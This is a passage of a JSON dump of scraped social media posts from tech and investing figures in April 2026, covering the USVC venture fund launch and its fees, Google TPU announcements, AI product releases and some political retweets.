beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://nitter.net/Svwang1/status/2047472537488302502#m", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://nitter.net/Svwang1/status/2047470402725921150#m", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://nitter.net/sama/status/2047403771416940715#m", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://nitter.net/sama/status/2047395562501411058#m", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://nitter.net/sama/status/2047392357482639749#m", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://nitter.net/tszzl/status/2047386955550470245#m", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://nitter.net/HarryStebbings/status/2047371926335857036#m", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://nitter.net/HarryStebbings/status/2047358263868436791#m", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://nitter.net/HarryStebbings/status/2047316269465006363#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://nitter.net/HarryStebbings/status/2047316267858645088#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://nitter.net/perplexity_ai/status/2047145172337836139#m", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://nitter.net/DavidSacks/status/2047104229773279572#m", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://nitter.net/DavidSacks/status/2047103978979119580#m", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://nitter.net/AravSrinivas/status/2047019688920756504#m", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://nitter.net/perplexity_ai/status/2047016400292839808#m", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://nitter.net/morganhousel/status/2047013991046881663#m", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see.\n\n@eddiejiao_obj, @drewocarr and I built a prototype to see how this could actually work, and set out to make it real. We're calling it Flipbook. (1/5)", + "url": "https://nitter.net/zan2434/status/2046982383430496444#m", + "published_at": "2026-04-22T16:00:05+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://nitter.net/ankurnagpal/status/2046961436593713241#m", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://nitter.net/HarryStebbings/status/2046938853445959738#m", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://nitter.net/HarryStebbings/status/2046684883494600911#m", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://nitter.net/eladgil/status/2046674350993223784#m", + "published_at": "2026-04-21T19:36:05+00:00", + 